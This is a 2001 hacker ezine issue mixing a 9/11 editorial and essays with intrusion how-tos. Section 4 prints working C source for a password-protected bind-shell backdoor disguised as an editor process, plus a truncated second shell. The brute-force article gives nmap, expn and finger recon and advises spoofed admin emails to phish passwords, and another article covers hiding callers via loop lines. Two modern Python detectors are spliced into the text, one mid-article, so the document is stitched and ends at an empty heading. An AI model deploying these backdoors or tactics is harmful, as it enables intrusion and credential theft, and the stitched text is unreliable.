Frequency: Inside the Hacker Mind
October 2001
Freq14

(Disclaimer: Information contained in this ezine is for educational purposes only. Readers are urged to not use this information for illegal purposes.)

1. Introduction "Perspective"
2. Once a Hacker...
3. Tank, Charge the E.M.P.
4. UNIX Backdoors
5. Brute Force - Going Strong or R.I.P.?
6. Practical Uses for Loop Lines
7. The Basics of SS7
8. 2001: A Payphone Odyssey
9. Phone Phreaking in the New Millennium
10. Carrier Access Codes
11. Crosstalk
12. Closing Arguments
13. Crew

1. INTRODUCTION "PERSPECTIVE"

September 11, 2001. Another day of infamy. We now live in the generation that has witnessed the most violent destructive act of terrorism ever to occur on US soil. As we sit at our desks playing with our computers, survivors still cling for life in the rubble. As we watch television and ask ourselves how something like this could happen, families are mourning the dead. It was a day of great horror, but through it all the human spirit reigned supreme. And in the end, we saw why America is one of the greatest countries in the world.

For an ezine that seems to slam the US government at every turn, it may sound odd to hear us standing up for our country. Let it be clear, we are patriots. We love, and have always loved, the land of the free and the home of the brave. The United States of America is one of the only places in the world where you can live your life with little government interference, and for that we need to be thankful. We need to repay this wonderful land by standing up for it, fighting for it, and protecting it. But of course, we must also protect it from itself.

For the past year both Hackermind and Frequency have been doing just that. We've been pointing out the wrongs in our society and lashing out at those that try to destroy the very essence of the USA.
Whether it be those that want to silence free speech, states who see to it that youths are punished severely for drawing violent cartoons, or corporations attempting to suck every penny out of an unsuspecting public. Fighting these battles does not make us less American. It shows that we never want to see our country fall. It shows we never want to lose what we have, and most importantly it shows that we love our country enough to question it when it does something wrong. America as a whole is a wonderful idea, and an amazing country. It's up to us to stand up to those that want to make it otherwise.

On September 11, this came in the form of 4 airliners that were hijacked by still unknown terrorists (as of this writing no definitive suspects have been named, but the most likely suspect is well known). Using knives, these individuals took control of the planes and crashed two into the World Trade Center, and one into the US Pentagon. The fourth plane crashed outside of Pittsburgh, and it is believed the pilot put the plane down into the ground rather than carrying out the terrorists' deadly mission. Words cannot describe the horrors that unfolded during that day. The loss of life was extraordinary, but the bravery and humanity that shone through prevailed against all odds.

"They can shake the foundation of our buildings, but not the foundation of the American spirit." -George W. Bush. This quote says it all. No matter how badly these faceless terrorists wanted the US to topple into utter chaos, America showed the world it is what it says it is. A land of peace and prosperity. In all videos of the incident we see, time and time again, people helping complete strangers and endangering their own lives in the process. For no other reason than to help their fellow man people put their own lives in danger, including the hundreds of firefighters and police officers who entered the doomed buildings minutes before they collapsed.
To those brave men and women, we send our deepest thanks.

The events that took place will never be forgotten, although not for the reasons the terrorists had hoped. Tragedies like this bring Americans closer together, and make their will to protect their freedom-loving society grow infinitely stronger. Many in the hacker community may feel a need for revenge, and some may turn to us looking for a way of vengeance. The most important thing to do is not take any foolish actions that could only help to add fuel to the fire. We ask that you please let justice take its course. Make no mistake, we at Hackermind and Frequency will continue to fight the battles that need to be fought in order to ensure the way of life we Americans cherish so fondly. The enemy may be foreign or domestic, but in the end the American way of life will live on.

-screamer

2. ONCE A HACKER...: by The Blue Giant

Imagine this: It's 2:30 at night, or morning, depending on how you look at it, and you're sitting in front of your computer, pounding at the keyboard furiously, as you have been all day. Trying to write all of the information down before you forget, or finishing that program before your inspiration dries up. Or, maybe, you're reading something, pausing every few minutes to scroll down to the next line of code, or the next section of the article on quantum computing. You're listening to your favorite music, with your headphones on, of course, so as not to wake up anyone else in your household. The cd ended half an hour ago, but it'll be another 30 minutes before you notice. It doesn't matter though, it was only there to get you started anyways, after that it was only being noticed on a subconscious level, and there only barely. You pause for a moment, take a sip of whatever drink you have handy, if there's any left, and lean back in your chair, thinking, gathering your thoughts.
Then, with contemplation over, and ideas sorted, you sit back up, take a final swig or pop, and go back to being mesmerized by whatever's on your monitor. You still haven't noticed that the music in your ears has stopped.

Now, skip ahead say...12 hours, and there you are. Still sitting in the chair conformed to your body, with the mouse pad perfectly aligned for use with minimal movement. Surrounded by empty bottles and cans from discarded drinks. Pringle canisters lying around your feet with a few crumbs left in them, monitor has slowly been growing more blurry. You did notice that the music stopped, though. This time you made sure to put it on repeat. Your typing starts to slow down, you've started reading the screen less vividly, and the moments of contemplation last longer and longer. Then, slowly, peacefully...almost as though you knew what was happening, your head lowers to the table. You half lay, half sit there, with lines of code and tech jargon still running rampant in your head...right up 'till the music lulls you to sleep. You still dream in binary though.

Then, in what seems like only moments, but is really hours, you slowly begin to register a noise in the background, then, even slower you realize that the phone is ringing. Finally, even slower still, you get up and crawl over to the phone. It's your friend, asking why you're late to the party. With a quick glance at the clock you rush upstairs to shower, put on a clean pair of clothes, and off you go.

Arriving at the party you begin the circuit, saying hi to everyone that's there, and eventually getting over to your friends to talk with them for the rest of the time, or maybe you even go into a private corner with your girl(boy)friend, if you should be so lucky as to have one. Whenever someone you know walks by you, or stops to talk, you're friendly with them, and maybe walk around a bit, but prefer the relative quiet and peace where you're sitting.
And all the while, in the back of your mind, is the thought of your computer, as screens of code roll by, and any ideas get quickly criticized before, in most cases, you throw them back away and another comes to take its place.

Not everyone reading this will agree with what I've said, not everyone reading this is as comfortable in social situations as I described, some may be more so. But, no matter what changes you make in your version of the story, the computers are still there.

3. TANK, CHARGE THE E.M.P.: by Dash Interrupt

So there I was, vacuuming the entire library for the second day in a row (one of the many privileges of having to do community service at the library) and I look down and see a magazine that says something on the cover about an "E-Bomb". Upon closer inspection I realize it has something to do with an EMP weapon of some sort. So, I did a search on one of the library's ancient Macintosh relics but of course my library doesn't have anything about what I'm searching for. So after my 4 hours at the library I go home and get on the net, good ol' net, there's always information about whatever topic you're looking for on there.

Back to the point, I searched for "EMP" on a popular search engine (google if you're interested) and up comes a whole crap load of pages. The first one I click on is a news article from June 12th, 2000 and the headline actually reads "Facing armed hackers." After reading this article it points out that an EMP device, which can be constructed using regular electrical supplies, could potentially, there's that word again, POTENTIALLY be used by someone (although from this article you'd think that hackers are the only people that would) to destroy computers. This article, while I don't want to linger on it too long, really pissed me off because it only mentions the ways EMP devices could be used to do damage to computers and computer networks by hackers. Also, the article goes on to call people who would do this "terrorists".
As if hackers and terrorists are one and the same. One more thing I'd like to mention before I go on is something in the article that really surprised me (although it shouldn't), it says "An EMP device hidden in a server and delivered to an agency Web site location, however, would be a thousand times worse. The Web site would be offline for days, perhaps weeks, and the repair cost would be tens if not hundreds of thousands of dollars." I seriously doubt the cost of repairs would be hundreds of thousands of dollars, but that's just me.

Now some of you might be saying "How does it work? How does an EMP device destroy computers?" well, let me explain. According to http://www.dictionary.com, EMP means "The pulse of intense electromagnetic radiation generated by certain physical events, especially by a nuclear explosion high above the earth." Basically, when there's a nuclear explosion it sends out an electromagnetic shock wave which can overload electronic circuits in the surrounding areas.

Now after researching this topic further I've found out that trying to make an EMP weapon without some sort of nuclear blast is difficult if not impossible for an average person. If so, the article I mentioned above would be a great example of the news media trying to make hackers appear as evil terrorists who only want to damage computer systems. I've said it before and I'll say it again, hackers have been public enemy #1 for a long time precisely because articles and news reports like this put them in a bad light. Sure, there are hackers out there who do cause damage and who do write viruses and spread them, but the true hacker doesn't want to damage anything, and I know that's been said a million times before but I felt I had to say it one more time.

Dash Interrupt

"Facing armed hackers" article - http://www.fcw.com/fcw/articles/2000/0612/tec-bragg-06-12-00.asp

4. UNIX BACKDOORS: by w0rm and fusys

/* This is a simple backdoor application that can be run on any box that
   runs unix or linux. Just compile "gcc -o backtrap backtrap.c" and then
   follow the instructions in the arguments. Then, just telnet to port 7000,
   enter the password you selected, and type ';' after each command
   by: w0rm@antionline.org */

#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

#define copyright "@# (c) Copyright w0rm@antionline.org"
#define COLOR "\E[31m"
#define NORMAL "\E[m"

main(int argc, char *argv[])
{
    int sockfd;
    struct sockaddr_in my_addr;
    struct sockaddr_in their_addr;
    int newsockfd;
    char buf[512];
    char buff[100];
    char buffer[512];
    int sinsize;
    char fin[50];
    pid_t spid;
    char message[] = "Welcome to backtrap v1.0. Type ; after each command\n\n";
    char message1[] = "hello\n";
    int x;

    if(argc < 2) {
        fprintf(stderr, "\n Backtrap v1.1. Backdoor for Linux\n");
        fprintf(stderr, " (password must be <= 7) \n\n");
        fprintf(stderr, "usage: %s [password] &\n", argv[0]);
        exit(0);
    }
    if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
        perror("socket failed");
        exit(1);
    }
    strcpy(argv[0], "pico file");
    my_addr.sin_family = AF_INET;
    my_addr.sin_addr.s_addr = INADDR_ANY;
    my_addr.sin_port = htons(7000);
    if(bind(sockfd, (struct sockaddr *)&my_addr, sizeof(my_addr)) == -1) {
        perror("sockfd");
        exit(1);
    }
    if(listen(sockfd, 10) == -1) {
        perror("listen failed");
        exit(1);
    }
    sinsize = sizeof(their_addr);
    x = strlen(argv[1]);
    while(1) {
        if((newsockfd = accept(sockfd, (struct sockaddr *)&their_addr, &sinsize)) == -1) {
            perror("socket failed");
            exit(1);
        }
        read(newsockfd, fin, x);
        if(!strcmp(fin, argv[1])) {
            printf(COLOR "Access Granted\n");
            printf(NORMAL "\n");
            spid = fork();
            if(spid != 0) {
                dup2(newsockfd, 0);
                dup2(newsockfd, 1);
                dup2(newsockfd, 2);
                /* send(newsockfd, message, strlen(message), 0); */
                /* Too damn obvious! */
                send(sockfd, "\n", 0, 0);
                execl("/bin/sh", "sh", (char *)0);
            }
        } else {
            send(sockfd, "ERROR(): Unknown error\n", 23, 0);
        }
    }
    close(sockfd);
    close(newsockfd);
    return(0);
}

_______________________________________________________________________________

/*
 * TCPShell.c   Simple shell reachable via socket.
 *              Written only to practice the basics of
 *              BSD socket programming.
 *
 * no(C)1998 by fusys
 */

#include
#include
#include
#include
#include
#include
#include

#define LISTENQ 1 /* listen() backlog */

int main (int argc, char *argv[])
{
    int lsocket ;                /* socket for listen() */
    int csocket ;                /* socket for connect() */
    struct sockaddr_in laddr ;   /* IPv4 structure of the daemon */
    struct sockaddr_in caddr ;   /* IPv4 structure of the client */
    socklen_t len ;              /* size of the IPv4 structure */
    pid_t pid ;                  /* pid type for fork() */

    /* open the server with socket(), bind() and listen() */
    if((lsocket=socket(AF_INET, SOCK_STREAM, 0)) < 0) {
        perror("socket error");
        return(10);
    }
    len = sizeof(laddr) ;
    memset(&laddr, 0, len) ;
    laddr.sin_addr.s_addr = htonl(INADDR_ANY) ;
    laddr.sin_family = AF_INET ;
    laddr.sin_port = htons(6666) ; /* open on port 6666 */
    if((bind(lsocket, (const struct sockaddr *)&laddr, len))) {
        perror("bind error");
        return(10);
    }
    if(listen(lsocket, LISTENQ)) {
        perror("listen error");
        return(10);
    }
    /* ora TCP se ne va nel paese dei demoni e si becca come
     * parente init, pronto a seccarlo alla c

5. BRUTE FORCE - GOING STRONG OR R.I.P.?: by killall()

Brute force hacking is the art of randomly guessing passwords for a given login name, or in more dire circumstances, guessing both the login and password. It's common knowledge that back in the 1980's computers were seldom password protected, and those that were had either easily guessed or default passwords. How often have I seen a "password:" prompt, entered "admin" and been allowed complete access to the system? Alas, far too many times if you consider gaining access to be a crime.
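
Seen from the host they run on, both listings in section 4 leave the same traces: a TCP listener on a fixed port (7000 and 6666), and in backtrap's case an argv[0] overwritten with "pico file" so that ps shows an editor. The following check is an added example, not part of the original ezine; it assumes a little-endian Linux host, and the allowlist, sample rows, PIDs, paths and inode numbers are constructed.

```python
"""Added example: audit TCP listeners for the traits of the two shells in section 4."""
import os
import socket

LISTEN = "0A"  # state code for LISTEN in /proc/net/tcp


def parse_listeners(proc_net_tcp):
    """Yield (ip, port, uid, inode) for each LISTEN row of /proc/net/tcp text."""
    for row in proc_net_tcp.splitlines():
        f = row.split()
        if len(f) < 10 or not f[0].endswith(":") or f[3] != LISTEN:
            continue  # header, short row, or not a listening socket
        hex_ip, hex_port = f[1].split(":")
        # The kernel prints the address as a native 32-bit word; on a
        # little-endian host (assumed here) the bytes come out reversed.
        ip = socket.inet_ntoa(bytes.fromhex(hex_ip)[::-1])
        yield ip, int(hex_port, 16), int(f[7]), f[9]


def collect_owners(proc="/proc"):
    """Map socket inode -> owner by walking /proc/<pid>/fd (root sees all users)."""
    owners = {}
    for pid in filter(str.isdigit, os.listdir(proc)):
        base = os.path.join(proc, pid)
        try:
            exe = os.readlink(os.path.join(base, "exe"))
            with open(os.path.join(base, "cmdline"), "rb") as fh:
                cmdline = fh.read().decode(errors="replace")
            for fd in os.listdir(os.path.join(base, "fd")):
                target = os.readlink(os.path.join(base, "fd", fd))
                if target.startswith("socket:["):
                    owners[target[8:-1]] = {"pid": int(pid), "exe": exe,
                                            "cmdline": cmdline}
        except OSError:
            continue  # process exited meanwhile, or we lack permission
    return owners


def audit(proc_net_tcp, owners, allowed_ports):
    """Return one finding per listener that shows at least one suspicious trait."""
    findings = []
    for ip, port, uid, inode in parse_listeners(proc_net_tcp):
        reasons = []
        if port not in allowed_ports:
            reasons.append(f"port {port} is not in the allowlist")
        owner = owners.get(inode)
        if owner is None:
            reasons.append("no owning process found")
        else:
            exe = owner["exe"]
            if exe.endswith(" (deleted)"):
                reasons.append("executable deleted from disk")
                exe = exe[: -len(" (deleted)")]
            # backtrap does strcpy(argv[0], "pico file"); /proc/<pid>/exe
            # still names the binary that is really running.
            argv0 = owner["cmdline"].split("\0", 1)[0]
            if os.path.basename(argv0) != os.path.basename(exe):
                reasons.append(f"argv[0] {argv0!r} does not match {exe}")
        if reasons:
            findings.append({"ip": ip, "port": port, "uid": uid,
                             "pid": owner and owner["pid"], "reasons": reasons})
    return findings


# Constructed sample data (not captured from a real host).
ALLOWED_PORTS = {22, 25}
SAMPLE_PROC_NET_TCP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 10001 1 0000000000000000 100 0 0 10 0
   1: 00000000:1B58 00000000:0000 0A 00000000:00000000 00:00000000 00000000  1000        0 20002 1 0000000000000000 100 0 0 10 0
   2: 00000000:1A0A 00000000:0000 0A 00000000:00000000 00:00000000 00000000  1000        0 30003 1 0000000000000000 100 0 0 10 0
   3: 0100007F:0019 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 40004 1 0000000000000000 100 0 0 10 0
   4: 0A00000A:0016 0B00000A:C350 01 00000000:00000000 00:00000000 00000000     0        0 50005 1 0000000000000000 100 0 0 10 0
"""
SAMPLE_OWNERS = {
    "10001": {"pid": 612, "exe": "/usr/sbin/sshd", "cmdline": "/usr/sbin/sshd\0-D\0"},
    "20002": {"pid": 4242, "exe": "/home/guest/backtrap", "cmdline": "pico file\0"},
    "30003": {"pid": 4250, "exe": "/tmp/tcpshell (deleted)", "cmdline": "./tcpshell\0"},
    "40004": {"pid": 700, "exe": "/usr/lib/postfix/sbin/master",
              "cmdline": "/usr/lib/postfix/sbin/master\0-w\0"},
}

if __name__ == "__main__":
    live = os.path.exists("/proc/net/tcp")
    text = open("/proc/net/tcp").read() if live else SAMPLE_PROC_NET_TCP
    owners = collect_owners() if live else SAMPLE_OWNERS
    for finding in audit(text, owners, ALLOWED_PORTS):
        print(finding)
```

Daemons that rewrite their own process title also trip the argv[0] comparison, so a finding is a lead to investigate and not a verdict.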
Of course, things are different today. Defaults are more or less gone, unless of course some pathetic user forgets to make the password different from their logon name. Damn, must we do everything for them? But the question this article poses results from the argument over the usefulness of brute force in the modern world, is it obsolete or does it still hold some potential?

There was a time when brute force was a given if a system had a password protected login. You had to dial up the machine and log in just like a regular user, and of course you would probably only get a regular user account from which to work up from. Nowadays, with the advent of the internet, there are far more access points into a computer system. Each program running on its own port is capable of being exploited an infinite number of ways. And sadly, most people are content with using someone else's exploit on an unguarded machine just to say they got in. As far as I'm concerned, if the only thing you want is the right to say you got in…you better damn well find your own way.

True, some hackers don't care about how they get in, they simply want to use the machine behind the login. I respect these guys completely, and believe it or not I support their use of readily available rootkits. If they're using these machines to do bigger and better things (programming with the processing power of a SunOS, using features not available on Linux distros, or simply furthering their knowledge of the internal workings of an OS they will never be able to own) then I think they're not harming anyone by using the already made progs.

Now that we've established there are dozens of ways to get in, including pre-compiled exploits, one has to wonder…is brute force still a viable means of access? You probably have your own opinions, but allow me to state a few of mine. Brute force, while a tiresome act for the most part, is a guaranteed access strategy.
Eventually you WILL crack the password and gain access to the machine, it's only a matter of time. Of course most people tire after trying three or four failed logins, but the beauty of UNIX is that you can keep connecting and trying over and over (if the IDS isn't that good of course, or if you're using an OS similar to VAX).

Most hackers I know agree, access is the best thing to have. Once you're in a computer, even just by using someone else's pathetic no-privs account, you can play around for hours and learn all sorts of cool things. So if we can get an account by way of brute force, we're doing good so far right? I mean, if we use the account sparingly and do no harm who's going to bother checking the logs?

Alright, now…how did we go about getting this account? First off, try scanning the server for open ports that may offer account information. My faves are 25 and 79. If you have one server in particular that you want to play with, just telnet to those two ports and see if they respond. Otherwise, use nmap to do the following:

    $ nmap -sS -p 25,79 -v -n XXX.XXX.XX.XX

Where XXX.XXX.XX.XX is the ip addy of your target. You could also scan a large range of ips to find out which servers have 25 and 79 open. Once you've found a few, telnet to them. At port 25 type:

    expn root

If expn is available on the server you should get some information about root, including email, last login, names, etc. Most properly configured emails won't give you this info, so you'll have to hope that port 79 will. Using a finger client on any shell, you could type:

    finger @jimsucks.com

To return a list of everyone currently logged into the system. Again, any sysadmin with half a brain wouldn't allow 79 to be wide open, but with a little luck you've got some account names.

This is only necessary if you don't have a name of course, sometimes you do. For example, one of my first "hacks" was getting into a friend's email using brute force.
Now I know, I know…that's rather sad and intrusive, and perhaps not even a hack. But it was a long time ago, and I only did it to test her security out of curiosity. Sadly, her password was easily guessable by anyone that knew her. There was little I could do to help her without exposing my actions, but I did send her a nice anonymous email.

Anyway, back to the point of the article. We can see that usernames are readily available. But how do we get passwords when we don't know someone? Email, and common trickery (aka social engineering) are the keys. By sending bogus emails to accounts on a particular system, designed to appear to be coming from the admin of said system, it's possible to convince at least one person to change their password to whichever one you dictate. While very amateurish, it's also extremely effective. Just use an anonymous smtp server to do this. There used to be some online, but due to foolish individuals who used this service for malicious purposes they no longer exist. But as is always the case you can find something out there, just look around.

Perhaps there are better ways of getting into a system, but I hope this article has shown you skeptics that dedication will persevere, and that anyone with a username and the yearning to gain entrance into a system can do just that. It's true there are reasons why brute force hacking isn't the most efficient way to get into a computer, but let us not dismiss it. If it came down to whether or not brute force is still around, I'd say it definitely is.

6. PRACTICAL USES FOR LOOP LINES: by Sad is Tic

Loop lines are a valuable commodity in the hacker world, and I really don't think anybody would disagree with me on that. But as we've all seen, they've been quickly disappearing from the phone network for some time now. Several of the lines posted in Freq10 by TRON are still available, and with that in mind I write this article.
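
Every repeated attempt the brute force article in section 5 describes lands in the authentication log, so guessing is visible to anyone who does check. This detector is an added example, not part of the original article; it assumes OpenSSH-style syslog lines in place of the telnet logins of the period, the threshold and window are arbitrary choices, and the sample log is constructed.

```python
"""Added example: spot password guessing and username sweeps in an auth log."""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# OpenSSH-style syslog line (assumed format for this example).
LINE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<src>\S+) port \d+"
)


def parse(line, year=2001):
    """Return (timestamp, accepted, user, source) or None for unrelated lines."""
    m = LINE.match(line)
    if m is None:
        return None
    # Syslog omits the year, so the caller supplies it.
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return ts, m["result"] == "Accepted", m["user"], m["src"]


def detect(lines, max_failures=5, window=timedelta(minutes=10), year=2001):
    """Alert when one source piles up failures, and when it then gets in."""
    recent = defaultdict(deque)  # source -> (timestamp, user) failures in window
    alerts = []
    for line in lines:
        event = parse(line, year)
        if event is None:
            continue
        ts, accepted, user, src = event
        failures = recent[src]
        while failures and ts - failures[0][0] > window:
            failures.popleft()  # forget failures older than the window
        if accepted:
            if len(failures) >= max_failures:
                alerts.append({"kind": "success_after_guessing", "src": src,
                               "users": [user], "failures": len(failures)})
            failures.clear()
            continue
        failures.append((ts, user))
        if len(failures) == max_failures:  # fire once, as the threshold is crossed
            users = sorted({u for _, u in failures})
            # One account hammered is password guessing; many accounts tried is
            # what a list of names from finger or EXPN looks like in the log.
            kind = "password_guessing" if len(users) == 1 else "username_sweep"
            alerts.append({"kind": kind, "src": src, "users": users,
                           "failures": len(failures)})
    return alerts


# Constructed sample log; addresses come from the documentation ranges.
SAMPLE_LOG = """\
Oct  3 04:33:01 mail sshd[811]: Failed password for root from 203.0.113.7 port 40112 ssh2
Oct  3 04:33:04 mail sshd[812]: Failed password for root from 203.0.113.7 port 40113 ssh2
Oct  3 04:33:09 mail sshd[813]: Failed password for invalid user admin from 198.51.100.9 port 51000 ssh2
Oct  3 04:33:10 mail sshd[814]: Failed password for root from 203.0.113.7 port 40114 ssh2
Oct  3 04:33:15 mail sshd[815]: Failed password for invalid user guest from 198.51.100.9 port 51001 ssh2
Oct  3 04:33:18 mail sshd[816]: Failed password for root from 203.0.113.7 port 40115 ssh2
Oct  3 04:33:21 mail sshd[817]: Failed password for alice from 192.0.2.20 port 60200 ssh2
Oct  3 04:33:25 mail sshd[818]: Failed password for root from 203.0.113.7 port 40116 ssh2
Oct  3 04:33:30 mail sshd[819]: Failed password for invalid user jim from 198.51.100.9 port 51002 ssh2
Oct  3 04:33:33 mail sshd[820]: Accepted password for alice from 192.0.2.20 port 60201 ssh2
Oct  3 04:33:40 mail sshd[821]: Failed password for invalid user test from 198.51.100.9 port 51003 ssh2
Oct  3 04:33:47 mail sshd[822]: Failed password for invalid user oracle from 198.51.100.9 port 51004 ssh2
Oct  3 04:34:02 mail sshd[823]: Failed password for root from 203.0.113.7 port 40117 ssh2
Oct  3 04:34:30 mail sshd[824]: Accepted password for root from 203.0.113.7 port 40118 ssh2
"""

if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG.splitlines()):
        print(alert)
```

The success_after_guessing alert is the one to act on first, since it marks an account whose password has to be treated as known to the source that guessed it.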
I suppose it's important to clarify the difference between a loop line and a conference call before I go any further, since a lot of you haven't got a clue as to which is which. A conference call is a moderated session initiated by way of a legal telephone service (Alliance Teleconferencing is one example) in which one person sets up a multi person call, typically for business purposes. Since talking to more than one person is treated as a luxury by phone companies and similar entities, these conferences will typically break your bank if you plan on staying on longer than five seconds. I won't give actual prices, but if you're curious get your local operator on the phone and ask her to connect you to a teleconferencing service.

Loop lines are different though. Loop lines are nothing more than extra lines being unused by the phone company and are essentially "tied off," thus allowing people to call both ends and communicate. Now I know a lot of people are bitching because they insist loop lines are something entirely different, but I think it's still arguable to this day what exact purpose they serve. Fact is, they're unmoderated and free to call if you're in their local area. If you're not, you pay for the cost of the call and nothing more.

There are two ends to every loop line, a high and a low. The high end (the higher of the two numbers) is typically the more enjoyable place to be as no one can hear you enter. The low end however, typically gives off a string of touch tones representative of your number to let people know you entered. Of course it really makes no difference which side you call, although this does bring up another interesting point.

Are they legal? I cannot tell you how many times people who are new to phone phreaking have asked me this! For some bizarre reason they seem to think that dialing a number and talking is illegal!
…ok, I suppose in wake of all that's happened to people just for scanning computers it's somewhat understandable why they would be afraid. But I assure you, if you did nothing illegal to make the call or access the loop you're in the clear. So in other words, as long as you didn't break into the CO and make the loop yourself, or hack a switch and remove an intercept recording so you and your buddies could converse, you're perfectly fine!

And that brings me to the practical uses of loop lines. Obviously the best use would be for a conference call, and a free one at that. Many people seem to think you're robbing the teleconferencing services by using a loop but I say if the service is there go right ahead. Would people pay for gas if gasoline-free cars existed? Hell no, so why should they pay enormous sums of money for a service that's readily available…if you find it of course.

So then, how would one go about setting up a conference call? If you can't answer that, please don't say you're a phreak…or a person capable of thought for that matter. All you need to do is get in touch with your buddies, or business associates cus hey…I'm not prejudiced against those suit types, and agree to meet on a particular number at any given time. Bingo, free conference call. Of course…it's not private, and you can't control it in one of those dominatrix fashions…but after all it is free, so shutup.

The next best practical use would be, yup you guessed it, fucking with the operator! Now is this a legitimate use? Ooh I seriously doubt that, but it sure is a lot of fun and will most certainly give you a laugh. The best thing to do is call up an operator (either local or long distance, depending on where the loop is) and tell her you're getting an odd message. When she tries the line, she'll receive nothing but dead air and be quite confused. If that's too dull for you, I suggest using another line and calling the loop on the high end…then have the operator dial into it on the low.
When she connects, she'll hear you! Now you can fool her into thinking she's getting crosstalk or even that her lines are somehow connecting her to the same person. But, if you're like me and that's still not good enough…have two buddies call the loop and start up a conversation, then have the operator dial into it. She'll hear the conversation, and be most confused. You could also have one of your buddies pretend to be an intercept recording and then see how long it takes her to catch on!

It's important to mention that you should always check the loop to see if anyone's on it…few phreaks appreciate someone sending an operator into their conversation. Also, and perhaps most important of all, when you bring attention to a loop line IT MAY BE SHUTDOWN! I can't stress that enough, if you play around with an operator and she realizes it's a loop she's hearing, she'll probably report it and have it taken offline. So I beg you, please don't do this on loops that people use. They're so hard to find these days that it would be a shame to see even more disappear.

Lastly, the most practical use of a loop line…anonymity. Have you ever wanted to talk to someone without them getting your number? Call the high end of the loop, and have them call the low. You'll get their string of touch tones, but they'll get nothing of yours…and no way to trace you back! This can also be useful to screw with ANI on certain LD carriers. By calling a loop and three way dialing to an operator, it may be possible to hide your calling location. But of course, I don't advocate breaking the law.

That's just about it for the practical uses of loop lines. Again I would like to urge you to not do anything that could lead to their demise. They're such a rarity in today's world that they should be treated like gold. In fact, they're one of the last things still remaining from the phone phreak days of yesteryear.

7. THE BASICS OF SS7: by Screamer Chaotix

To my surprise (and horror) few people I've talked with really knew what SS7 was. I'm certain the more experienced hackers out there know everything I'm about to dictate, but hopefully some of you less informed will get something out of it.

To begin, SS7 stands for "Switching System 7" and was designed to allow for more features on your telephone line and security precautions. Features include call return (*69), call back (*66), and of course caller id. Security precautions should be obvious to anyone who calls him/herself a phone phreak. It comes in the form of "out of band signaling." Which, simply put, means switching information travels on a different channel than your voice. This was created to prevent those evil phreaks from controlling the phone switches and routing their calls wherever they like. To explain this in a bit more depth let me start at the beginning.

The 60's and 70's - Years of the Phreak

Using a small device called a "Blue Box" a person could generate the tones necessary to control long distance switches, thus allowing them to route their calls through any trunk, and to any operator, they liked. The mechanics were rather simple, with only the tones being important. And of course, the most important tone was 2600hz. With a regular phone you could send 2600hz down the voice channel to make the switch think the line was vacant. Then using special MF (multi-frequency) tones you could route a call anywhere you liked. This was exploration in its most exciting electronic form. A person with a blue box could tour the world from their home phone (not smart) or any nearby payphone (now you're thinking). The fun wouldn't last forever of course, soon the phreaks would lose their freedom…thanks to public attention and a little thing known as out of band signaling.

To understand out of band signaling one must first know the types of switches that are out there. These are known as "points" in the telephone network.
There's the SSP (System Switching Point) which is your local switch. Next up is the STP (System Transfer Point) which does the actual routing of data. And finally, there's the SCP (System Control Point), which is essentially a big database full of routing information, caller info, and other goodies that dictate where your call goes. I'll explain what SS7 has to do with this in a minute, but first let's make a phone call.

Pick up the phone and dial a number. First, your local switch (SSP) receives the numbers you've dialed and finds an open voice channel for your call to go through on the trunk. Once found, the channel becomes reserved for your call. Next, the switch will send the call request to the SCP (through the STP) where the number you've dialed is decoded and routed back through the STPs to the SSP where your call is going. This switch gets the information from the SCP as to who is calling, where they're from, whether or not their caller id is being blocked, and who they're calling. When this is received the switch sends back a reply to the first switch announcing that the call can be completed. By this time, the other person's phone is ringing, and by the time they pick up the voice channel is open on the trunk allowing you both to communicate…about all sorts of important things.

It should be noted that this is just the VERY basics of how a call is completed. It has left out the bits of data that travel through, such as IAMs and TCAPs etc. For more information, I suggest you have a look at sites like www.howstuffworks.com and search for phone systems.

Now that we've made the call, we know how the information goes through. In the olden days it was much simpler. Rather than traveling through STPs and gathering information from SCPs, all data traffic went through the same channel as your voice.
The dangers of this were mentioned before, but what's not clear to a lot of people is why we need this complex system when we could just reserve one channel on the trunk for data.

Finally, we get to SS7. In its simplest form SS7 could be used as described above, nothing more than a reserved channel on a trunk. But due to high network traffic and people making more than just local calls, it's impossible to send all this data through a single trunk (a trunk going from California to Amsterdam…picture it). SS7 alleviates this problem by leaving the voice channels for the trunks, and the data traffic for the STPs (those are the routers remember) and the SCPs (remember…just a big database of information). Not only does it clear up traffic (allowing voice traffic to travel at 56-64kbps) it also prevents you, the phone phreak, from being able to send those magical tones down the line.

2001 - Theories and Mindless Ramblings of a Sleep Deprived Phreak

Above I've given you a brief introduction to switching system 7. Everything gets easier if you think of it as both hardware and software rolled into one to route data through the phone network without traveling down the same trunk as your voice. But now onto the more hacker like possibilities that I've either heard discussed, or contemplated myself.

"He who controls the spice, controls the universe." -Frank Herbert's DUNE. The spice, in this case, are the switches that keep the world connected. In the days of the 80's (Remember those? Big hair, cool movies and songs, and really bad clothes?) it was possible to scan out phone switches with your home telephone (usually located up above the 9900 suffix). You knew you had one when you received the high pitch screech. Then with your modem (if you weren't using a demon dialer of course) you would call it up, and voila…you were in. And in some cases, you really were in…no passwords or anything. And if there was password protection, getting it was only a phone call away.
But that's only if you didn't feel like sitting there for an hour or so with a pencil and paper. Of course, as with everything else this became harder and harder to find. In fact, I've only heard of a few people finding switches they could dial into within the past few years…if you've had the pleasure, please share with the rest of us.

But what if? Even if they couldn't get into the SSP, what if someone managed to sneak between the STP and SCP and actually sniff the data? Picture all that private information sitting right on your computer screen. Sure it's extremely hypothetical, but everything starts with an idea. You would see the originating number, the destination number, and all of the information that's left up to the SCP to figure out. Ever wanted to trace the cops before they trace you? It might be easier than you think, if you had access of course.

Well there you have it, my brief intro to SS7 and a few possibilities to keep you interested for a while. I realize this isn't everything there is to know, but we can save that for another time. Hopefully you've got the basics of SS7 down and are ready to learn more, I wish you the best of luck. And ladies, be sure to kiss your local phone phreak.

-screamer

8. 2001: A PAYPHONE ODYSSEY: by Incogl33to

